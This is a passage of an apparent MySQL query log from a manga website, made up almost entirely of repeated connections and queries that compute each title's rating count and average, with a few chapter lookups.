(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330647162 Quit 330647163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330647163 Quit 330647164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330647164 Quit 330647165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330647165 Quit 330647166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330647166 Quit 330647167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330647167 Quit 330647168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330647168 Quit 330647169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330647169 Quit 330647170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330647170 Quit 330647171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330647171 Quit 330647172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330647172 Quit 330647173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330647173 Quit 330647174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330647174 Quit 330647175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330647175 Quit 330647176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330647176 Quit 330647177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330647177 Quit 330647178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330647178 Quit 330647179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330647179 Quit 330647180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330647180 Quit 330647181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330647181 Quit 330647182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330647182 Quit 330647183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330647183 Quit 330647184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330647184 Quit 330647185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330647185 Quit 330647186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330647186 Quit 330647187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330647187 Quit 330647188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330647188 Quit 330647189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330647189 Quit 330647190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330647190 Quit 330647191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330647191 Quit 330647192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330647192 Quit 330647193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330647193 Quit 330647194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330647194 Quit 330647195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330647195 Quit 330647196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330647196 Quit 330647197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330647197 Quit 330647198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330647198 Quit 330647199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330647199 Quit 330647200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330647200 Quit 330647201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330647201 Quit 330647202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330647202 Quit 330647203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330647203 Quit 330647204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330647204 Quit 330647205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330647205 Quit 330647206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330647206 Quit 330647207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330647207 Quit 330647208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330647208 Quit 330647209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330647209 Quit 330647210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330647210 Quit 330647211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330647211 Quit 330647212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330647212 Quit 330647213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330647213 Quit 330647214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330647214 Quit 330647215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330647215 Quit 330647216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330647216 Quit 330647217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330647217 Quit 330647218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330647218 Quit 330647219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330647219 Quit 330647220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330647220 Quit 330647221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330647221 Quit 330647222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330647222 Quit 330647223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330647223 Quit 330647224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330647224 Quit 330647225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330647225 Quit 330647226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330647226 Quit 330647227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330647227 Quit 330647228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330647228 Quit 330647229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330647229 Quit 330647230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330647230 Quit 330647231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330647231 Quit 330647232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330647232 Quit 330647233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330647233 Quit 330647234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330647234 Quit 330647235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330647235 Quit 330647236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330647236 Quit 330647237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330647237 Quit 330647238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330647238 Quit 330647239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330647239 Quit 330647240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330647240 Quit 330647241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330647241 Quit 330647242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330647242 Quit 330647243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330647243 Quit 330647244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330647244 Quit 330647245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330647245 Quit 330647246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330647246 Quit 330647247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330647247 Quit 330647248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330647248 Quit 330647249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330647249 Quit 330647250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330647250 Quit 330647251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330647251 Quit 330647252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330647252 Quit 330647253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330647253 Quit 330647254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330647254 Quit 330647255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330647255 Quit 330647256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330647256 Quit 330647257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330647257 Quit 330647258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330647258 Quit 330647259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330647259 Quit 330647260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330647260 Quit 330647261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330647261 Quit 330647262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330647262 Quit 330647263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330647263 Quit 330647264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330647264 Quit 330647265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330647265 Quit 330647266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330647266 Quit 330647267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330647267 Quit 330647268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330647268 Quit 330647269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330647269 Quit 330647270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330647270 Quit 330647271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330647271 Quit 330647272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330647272 Quit 330647273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330647273 Quit 330647274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330647274 Quit 330647275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330647275 Quit 330647276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330647276 Quit 330647277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330647277 Quit 330647278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330647278 Quit 330647279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330647279 Quit 330647280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330647280 Quit 330647281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330647281 Quit 330647282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330647282 Quit 330647283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330647283 Quit 330647284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330647284 Quit 330647285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330647285 Quit 330647286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330647286 Quit 330647287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330647287 Quit 330647288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330647288 Quit 330647289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330647289 Quit 330647290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330647290 Quit 330647291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330647291 Quit 330647292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330647292 Quit 330647293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330647293 Quit 330647294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330647294 Quit 330647295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330647295 Quit 330647296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330647296 Quit 330647297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330647297 Quit 330647298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330647299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647298 Quit 330647300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330647299 Quit 330647300 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17258' 330647301 Quit 330647302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330647302 Quit 330647300 Quit 330647303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647303 Query select * FROM chapters where id = '17258' 330647304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330647304 Quit 330647303 Quit 330647305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330647305 Quit 330647306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647306 Query select * FROM chapters where manga_id = '197' order by id desc 330647307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330647307 Quit 330647308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330647308 Quit 330647309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330647309 Quit 330647310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330647310 Quit 330647311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330647311 Quit 330647312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330647312 Quit 330647313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330647313 Quit 330647314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330647314 Quit 330647315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330647315 Quit 330647316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 